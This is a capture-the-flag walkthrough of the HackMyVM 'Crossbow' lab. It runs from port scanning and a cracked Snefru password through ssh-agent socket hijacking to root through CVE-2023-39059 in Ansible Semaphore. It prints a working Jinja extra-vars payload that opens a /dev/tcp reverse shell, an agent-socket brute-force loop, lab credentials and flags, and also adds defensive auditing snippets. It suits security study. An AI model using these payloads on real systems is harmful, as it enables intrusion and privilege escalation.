HackMyVM Crossbow: Detailed Walkthrough (WP)
Author: 城南花已开

Information Gathering

Service Detection

Three ports are open; one of them is 9090.

```
❯ ip=192.168.56.116
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.116:22
Open 192.168.56.116:80
Open 192.168.56.116:9090
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 16:19 CST
Initiating Ping Scan at 16:19
Scanning 192.168.56.116 [4 ports]
Completed Ping Scan at 16:19, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:19
Completed Parallel DNS resolution of 1 host. at 16:19, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:19
Scanning 192.168.56.116 [3 ports]
Discovered open port 22/tcp on 192.168.56.116
Discovered open port 80/tcp on 192.168.56.116
Discovered open port 9090/tcp on 192.168.56.116
Completed SYN Stealth Scan at 16:19, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.56.116
Host is up, received reset ttl 63 (0.0011s latency).
Scanned at 2024-12-15 16:19:46 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 62
9090/tcp open zeus-admin syn-ack ttl 62

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 7 (284B) | Rcvd: 4 (172B)
```

Port 80 has nothing of much value, just a mention of a user named polo, so I tried scanning for directories.

It seems there is nothing besides index. I switched to a different wordlist, but it was too slow, so I stopped.

```
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x html,zip,htm,txt,php  -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.116
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip,htm
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 5205]
/index.html (Status: 200) [Size: 5205]
Progress: 28404 / 28410 (99.98%)
===============================================================
Finished
===============================================================
```

Turning to port 9090, there is a login page, but I don't know the credentials. I looked at the page source here; the general functionality is visible, but there is no password.

Back on port 80, when index is requested, config.js is requested at the same time.

It contains a hash and a URL. I added the hostname to /etc/hosts, but the site had nothing useful. The information in this config is probably the password for port 9090.

```
❯ curl phishing.crossbow.hmv
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Site Under Construction</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
..................... (omitted)
</head>
<body>
<div class="container">
<h1>Under Construction</h1>
<p>We're working hard to improve our website and we'll be back soon!</p>
</div>
</body>
</html>
```

We obtain the hash 49ef6b765d39f06ad6a20bc951308393, and the "processd" processing step shows that the algorithm is SnefruTools V1.

A matching online lookup site can be found on Google: "snefru hash decoder and calculator".

This yields the password ELzkRudzaNXRyNuN6.

Guessing that the port 9090 user is polo with this password, let's try logging in.

User Privilege Escalation

There is a terminal inside, and it drops you straight in as the polo user.

Use nc to send a reverse shell back to Kali.

```
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
id
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.116] 48346
uid=1001(polo) gid=1001(polo) groups=1001(polo)
/usr/bin/script -qc /bin/bash 2>/dev/null
polo@crossbow:~$
polo@crossbow:~$ cd ..
polo@crossbow:/home$ ls
lea polo
```

There is another user, lea.

The polo user has few privileges, though. When I changed to the root directory I noticed this shell is inside a Docker environment.

There is a hidden .dockerenv file.

And when I checked the IP address it wasn't my VirtualBox IP either; it looks like a Docker bridge IP.

```
polo@crossbow:/$ ls -al
total 80
drwxr-xr-x 1 root root 4096 Dec 14 2023 .
drwxr-xr-x 1 root root 4096 Dec 14 2023 ..
-rwxr-xr-x 1 root root 0 Sep 15 2023 .dockerenv
lrwxrwxrwx 1 root root 7 Aug 14 2023 bin -> usr/bin
drwxr-xr-x 2 root root 4096 Jul 14 2023 boot
drwxr-xr-x 5 root root 340 Dec 15 08:16 dev
drwxr-xr-x 1 root root 4096 Dec 14 2023 etc
drwxr-xr-x 1 root root 4096 Sep 18 2023 home
lrwxrwxrwx 1 root root 7 Aug 14 2023 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Aug 14 2023 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Aug 14 2023 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Aug 14 2023 libx32 -> usr/libx32
-rw-r--r-- 1 root root 0 Dec 14 2023 lol
drwxr-xr-x 2 root root 4096 Aug 14 2023 media
drwxr-xr-x 2 root root 4096 Aug 14 2023 mnt
drwxr-xr-x 2 root root 4096 Aug 14 2023 opt
dr-xr-xr-x 162 root root 0 Dec 15 08:16 proc
drwx------ 1 root root 4096 Sep 16 2023 root
drwxr-xr-x 1 root root 4096 Dec 15 08:16 run
lrwxrwxrwx 1 root root 8 Aug 14 2023 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Aug 14 2023 srv
dr-xr-xr-x 13 root root 0 Dec 15 08:16 sys
drwxrwxrwt 4 root root 4096 Dec 15 08:58 tmp
drwxr-xr-x 1 root root 4096 Aug 14 2023 usr
drwxr-xr-x 1 root root 4096 Sep 3 2023 var
polo@crossbow:/$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
```

I also uploaded linpeas; its enumeration confirms this user is running inside Docker.

When I changed to the /tmp directory I found some interesting files:

```
polo@crossbow:/tmp$ ls -al
total 16
drwxrwxrwt 4 root root 4096 Dec 15 09:17 .
drwxr-xr-x 1 root root 4096 Dec 14 2023 ..
srwxrwxrwx 1 polo polo 0 Dec 15 08:52 dbus-o6gpC36Ov1
drwx------ 2 polo polo 4096 Dec 15 08:52 ssh-XXXXXXFJyjV2
drwx------ 2 lea lea 4096 Dec 15 08:16 ssh-XXXXXXbE0VxJ
```

Two of these are owned by polo and one by lea.

Looking at the running processes, lea is running /home/lea/.local/agent.

What is ssh-agent? After some searching: it can be thought of as a manager for SSH private keys.

```
lea           12  4.7  0.1   4564  3352 ?        S    08:16   2:46 /bin/bash /home/lea/.local/agent
lea 719522 0.0 0.0 4564 576 ? R 09:14 0:00 _ /bin/bash /home/lea/.local/agent
root 27 0.0 0.1 3976 2016 ? Ss 08:16 0:00 /usr/sbin/cron
lea 1082 0.0 0.1 7792 2912 ? Ss 08:16 0:00 ssh-agent
polo 450045 0.0 0.0 7660 776 ? Ss 08:52 0:00 /usr/bin/ssh-agent
```

When we run ssh-agent, it outputs the environment variables to be imported and then prints the agent's PID.

That environment variable points exactly at the newly created socket under /tmp.

The normal way to start it is eval "$(ssh-agent -s)",

which then only prints the PID.

You can also notice that the socket file agent.830207 is close to, but not the same as, the PID ssh-agent reports; it seems to differ by 2 each time.

```
polo@crossbow:/tmp$ ssh-agent
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXApBNia/agent.830207; export SSH_AUTH_SOCK;
SSH_AGENT_PID=830209; export SSH_AGENT_PID;
echo Agent pid 830209;
polo@crossbow:/tmp$ ls -al
total 20
drwxrwxrwt 5 root root 4096 Dec 15 09:22 .
drwxr-xr-x 1 root root 4096 Dec 14 2023 ..
srwxrwxrwx 1 polo polo 0 Dec 15 08:52 dbus-o6gpC36Ov1
drwx------ 2 polo polo 4096 Dec 15 09:22 ssh-XXXXXXApBNia
drwx------ 2 polo polo 4096 Dec 15 08:52 ssh-XXXXXXFJyjV2
drwx------ 2 lea lea 4096 Dec 15 08:16 ssh-XXXXXXbE0VxJ
polo@crossbow:/tmp$ cd ssh-XXXXXXApBNia
polo@crossbow:/tmp/ssh-XXXXXXApBNia$ ls
agent.830207
```

The related ssh-agent abuse is documented on HackTricks:

SSH Forward Agent exploitation | HackTricks

We can use this SSH agent to connect as lea, but we have no permission to read lea's directory and see the agent.xxxxx socket name inside it.

ssh-agent works through the environment variables SSH_AUTH_SOCK and SSH_AGENT_PID. Regardless of user or terminal, an agent process cannot be used unless these two variables are set to match it. To use a particular agent, you must first set these two variables in your own shell.

Write a script to brute-force numbers around 1082 to guess the agent.xxxx name under lea's ssh-XXXXXXbE0VxJ directory.

```
polo@crossbow:/tmp$ for i in {1082..1090};do SSH_AUTH_SOCK=/tmp/ssh-XXXXXXbE0VxJ/agent.$i ssh [email protected];done
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
[email protected]: Permission denied (publickey,password).
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
[email protected]: Permission denied (publickey,password).

[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
[email protected]: Permission denied (publickey,password).
...................... (omitted)
```
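From the defender's side, the precondition for reusing someone else's agent like this is an agent socket that another local user can reach. The audit below is an added example, not code from the writeup: it walks a tmp root for ssh-*/agent.* sockets and flags any whose directory or socket mode grants group/other access. The directory names mirror the writeup's /tmp listing; the layout, the weakened 0755 directory and the function names are constructed for the example.

```python
import os
import socket
import stat
import tempfile

def audit_agent_sockets(tmp_root):
    """Return (socket_path, problem) pairs for ssh-agent sockets under tmp_root
    whose directory or socket mode grants access to group/other users."""
    findings = []
    for name in sorted(os.listdir(tmp_root)):
        d = os.path.join(tmp_root, name)
        if not (name.startswith("ssh-") and os.path.isdir(d)):
            continue
        dir_mode = stat.S_IMODE(os.lstat(d).st_mode)
        for entry in sorted(os.listdir(d)):
            p = os.path.join(d, entry)
            st = os.lstat(p)
            if not (entry.startswith("agent.") and stat.S_ISSOCK(st.st_mode)):
                continue
            # ssh-agent creates its directory 0700; any group/other bit lets
            # another user traverse it and try agent.<pid> names.
            if dir_mode & 0o077:
                findings.append((p, "dir mode %o reachable by others" % dir_mode))
            # connect() on a UNIX socket requires write permission on it.
            sock_mode = stat.S_IMODE(st.st_mode)
            if sock_mode & 0o022:
                findings.append((p, "socket mode %o writable by others" % sock_mode))
    return findings

def build_sample(root):
    """Constructed layout modelled on the writeup's /tmp: one directory as
    ssh-agent creates it (0700) and one hypothetically weakened to 0755."""
    for name, mode in (("ssh-XXXXXXbE0VxJ", 0o700), ("ssh-XXXXXXApBNia", 0o755)):
        d = os.path.join(root, name)
        os.mkdir(d)
        sock_path = os.path.join(d, "agent.1082")
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(sock_path)  # creates a real socket inode, as ssh-agent does
        s.close()
        os.chmod(sock_path, 0o600)
        os.chmod(d, mode)
    return root

def sample_findings():
    """Build the constructed layout in a scratch directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        return audit_agent_sockets(build_sample(root))
```

Point audit_agent_sockets at /tmp on a live host to check real agents; sample_findings only exercises the constructed layout and reports the weakened directory.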

This user can't log in. I suspected there were other users, and on port 9090 I found another user, pedro.

Try logging in with this user; just keep pressing Enter.

```
polo@crossbow:/tmp$ for i in {1060..1110};do SSH_AUTH_SOCK=/tmp/ssh-XXXXXXbE0VxJ/agent.$i ssh [email protected];done
-------------- (omitted) ----------------
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
[email protected]: Permission denied (publickey,password).
Last login: Fri Dec 15 18:56:12 2023 from 172.17.0.2
╭─pedro@crossbow ~
╰─$ ls
user.txt
╭─pedro@crossbow ~
╰─$ cat user.txt
58cb1e1bdb3a348ddda53f22ee7c1613
╭─pedro@crossbow ~
╰─$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
```

Nothing exploitable there, so I looked at the network connections.

Two ports are only open locally: 3306 and 3000.

```
╭─pedro@crossbow ~
╰─$ ss -lutnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 4096 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:3000 0.0.0.0:*
tcp LISTEN 0 4096 0.0.0.0:9090 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 4096 [::]:80 [::]:*
tcp LISTEN 0 4096 [::]:9090 [::]:*
╭─pedro@crossbow ~
╰─$ curl 127.0.0.1:3306
curl: (1) Received HTTP/0.9 when not allowed
╭─pedro@crossbow ~
╰─$ curl 127.0.0.1:3000 1 ↵
<!DOCTYPE html>
<html lang="en">
<head>
<base href="/">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<link rel="icon" href="favicon.png">
<title>Ansible Semaphore</title>
<script defer type="module" src="js/chunk-vendors.66355ca7.js"></script><script defer type="module" src="js/app.b2fc4bb2.js"></script><link href="css/chunk-vendors.e1031f37.css" rel="stylesheet"><link href="css/app.13f6f466.css" rel="stylesheet"><script defer src="js/chunk-vendors-legacy.b392e67e.js" nomodule></script><script defer src="js/app-legacy.cefb5b9b.js" nomodule></script></head>
<body>
<noscript>
<strong>
We're sorry but web doesn't work properly
without JavaScript enabled. Please enable it to continue.
</strong>
</noscript>
<div id="app"></div>
<!-- built files will be auto injected -->
</body>
</html>
```

Note the title: Ansible Semaphore.

A quick search shows it is an open-source, web-based automation tool.

The relevant CLI commands can be found in the official documentation.

```
╭─pedro@crossbow ~
╰─$ semaphore version
v2.8.90
```

Root Privilege Escalation

Let's try port forwarding; conveniently, the target has socat installed.

Expose local port 3000 on port 3001.

```
╭─pedro@crossbow ~
╰─$ which socat 1 ↵
/usr/bin/socat
╭─pedro@crossbow ~
╰─$ socat TCP4-LISTEN:3001,fork TCP4:localhost:3000 &
[1] 1881135
```

Another login page. When I tried a weak password, it let me in.

The username and password are both admin.

There is a CVE for this: CVE-2023-39059.

The --extra-vars parameter can be abused by a low-privileged malicious user to achieve remote command execution (RCE), read files and configuration, perform server-side request forgery (SSRF), execute commands, and establish a reverse shell on the Ansible server.

Payload: {"ansible_user": "{{ lookup('ansible.builtin.pipe', \"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\") }}"}

So it appears commands can be executed.
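The payload works because a value supplied in extra-vars is handed to Ansible's Jinja2 templating, so a lookup inside it runs on the server. As a mitigation-side illustration (added here, not Semaphore's code), the following hypothetical validator walks an extra-vars JSON document and reports every string value carrying Jinja2 delimiters; the sample inputs are constructed, with the malicious one modelled on the payload above but reduced to a harmless id lookup.

```python
import json
import re

# Jinja2 expression, statement and comment delimiters.
TEMPLATE_MARKERS = re.compile(r"\{\{|\{%|\{#")

def find_template_injection(extra_vars_json):
    """Parse an extra-vars JSON string and return the dotted paths of all
    string values that contain Jinja2 delimiters (empty list = clean)."""
    try:
        data = json.loads(extra_vars_json)
    except json.JSONDecodeError as e:
        return ["<invalid JSON: %s>" % e.msg]
    hits = []

    def walk(node, path):
        if isinstance(node, dict):
            for k, v in node.items():
                walk(v, "%s.%s" % (path, k) if path else str(k))
        elif isinstance(node, list):
            for i, v in enumerate(node):
                walk(v, "%s[%d]" % (path, i))
        elif isinstance(node, str) and TEMPLATE_MARKERS.search(node):
            hits.append(path)

    walk(data, "")
    return hits

def is_safe_extra_vars(extra_vars_json):
    """True when no value would be expanded as a template by Ansible."""
    return not find_template_injection(extra_vars_json)

# Constructed inputs: a template-injection attempt and a benign override.
MALICIOUS = '{"ansible_user": "{{ lookup(\'ansible.builtin.pipe\', \'id\') }}"}'
BENIGN = '{"ansible_user": "deploy", "targets": ["web1", "web2"]}'
```

A server-side check like this belongs in front of the task runner, since the web form alone can be bypassed by calling the API directly.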

Rather than creating a new task, I tried modifying the existing "clean logs" task directly.

Edit the extra variables under the clean logs environment.

It errored out, but there is generally a fix for that online.

Just add the JSON entry "LC_ALL":"C.UTF-8" to the Environment variables.

Run it and you get the reverse shell.

```
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 1234
listening on [any] 1234 ...
id
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.116] 45144
bash: impossible de régler le groupe de processus du terminal (637): Ioctl() inapproprié pour un périphérique
bash: pas de contrôle de tâche dans ce shell
root@crossbow:/root# id
uid=0(root) gid=0(root) groupes=0(root)
root@crossbow:/root# ls
clean.yml
config.json
root.txt
root@crossbow:/root# cat root.txt
7a299c41b1daac46d5ab98745b212e09
```

Alternatively, following the official documentation, you can create a new playbook YAML file, which lets you modify file contents, permissions and so on however you like.
